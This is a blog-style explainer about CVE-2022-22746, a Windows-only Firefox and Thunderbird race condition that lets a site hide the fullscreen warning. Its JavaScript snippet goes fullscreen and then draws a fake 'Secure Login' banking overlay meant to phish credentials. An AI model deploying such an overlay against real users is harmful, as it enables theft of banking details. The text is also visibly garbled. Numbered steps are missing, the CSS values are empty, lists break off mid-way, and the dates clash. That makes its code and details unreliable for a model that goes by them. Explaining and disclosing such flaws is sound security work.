Published: 2024-06-17
Author: cybersec.exclusive
Introduction
In early 2022, a security vulnerability labeled CVE-2022-22746 was discovered in Firefox and related products. This bug, which affects only Windows users, made it possible for a malicious website to bypass the browser’s fullscreen notification—potentially allowing attackers to spoof websites or phish sensitive user credentials, all while remaining undetected.
If you’re using Firefox ESR < 91.5, Firefox < 96, or Thunderbird < 91.5 on Windows, this article is a must-read. Below, you’ll find an exclusive, easy-to-understand breakdown, example code, and official references.
The Fullscreen Notification Race Condition: What Is It?
Normally, when a website requests fullscreen mode, Firefox shows a notification bar at the top of the screen. This is a crucial security warning: it tells you which site has gone fullscreen so you’re not tricked by a fake browser UI or login page.
What happened with CVE-2022-22746?
A clever attacker could use a race condition to trigger fullscreen mode without the notification bar ever appearing—or just for a split second, not long enough for you to notice. This allowed for unnoticed fullscreen spoofing: think fake banking logins, fake system alerts, or even a phony desktop.
> Note: This bug does *not* affect Linux or macOS. Only Windows Firefox, Firefox ESR, and Thunderbird.
The malicious site rapidly requests fullscreen using JavaScript.
2. Simultaneously, it causes a context or focus shift (sometimes by creating/removing UI elements or triggering specific events).
Here’s a simplified JavaScript exploit pattern (for educational use only)
// WARNING: Do NOT run this on your main browser.
let fsElem = document.documentElement;
function enterFullScreenTrick() {
// Step 1: Set up a quick UI context change (here a dummy)
document.body.innerHTML = "<input autofocus id='trick' />";
let prank = document.getElementById('trick');
// Step 2: Slight delay, then ask for fullscreen
setTimeout(() => {
fsElem.requestFullscreen().then(() => {
// Step 3: Immediately blur the input or remove it to disrupt focus
prank.blur();
document.body.removeChild(prank);
// Step 4: Draw a fake UI
let fakeBar = document.createElement('div');
fakeBar.style = "position:fixed;top:;left:;width:100vw;height:100vh;background:white;z-index:9999;font-size:2em;text-align:center;padding-top:30vh;";
fakeBar.textContent = "🔒 Secure Login - Please Enter Your Banking Details";
document.body.appendChild(fakeBar);
});
}, 10); // Carefully chosen race timing
}
// Run exploit
enterFullScreenTrick();
The above snippet is a conceptual illustration, and careful tweaking of the timing and DOM changes was required to hit the exact race window on actual vulnerable builds.
Why Is This Dangerous?
Without a clear fullscreen notification, users couldn’t tell they were really, truly interacting with a website—not their browser, not their OS. This opened the door for:
Malicious overlays hiding the actual content
A short video demo (not provided here) could show this—full browser spoofing with no warning bar.
Thunderbird 91.5
If you’re not running at least these versions or later on Windows, you’re at risk. Update your browser now.
Official References
- Mozilla Security Advisory 2022-05
- CVE-2022-22746 on NIST
- Mozilla’s bug tracker: Bug 1745662
CVE-2022-22746 is a Windows-only Firefox bug allowing hackers to bypass the fullscreen warning.
- Exploiting it required precise timing and clever JavaScript/DOM tricks.
Potential dangers: phishing, fake UI takeovers, credential theft—*without the user realizing*.
- Update Firefox/ESR/Thunderbird ASAP if you’re on Windows and haven’t done so since early 2022.
Stay safe. Always keep your browsers and other software up to date!
*This exclusive write-up was brought to you by cybersec.exclusive—covering CVEs in the clearest possible terms.*
Timeline
Published on: 12/22/2022 20:15:00 UTC
Last modified on: 12/31/2022 04:02:00 UTC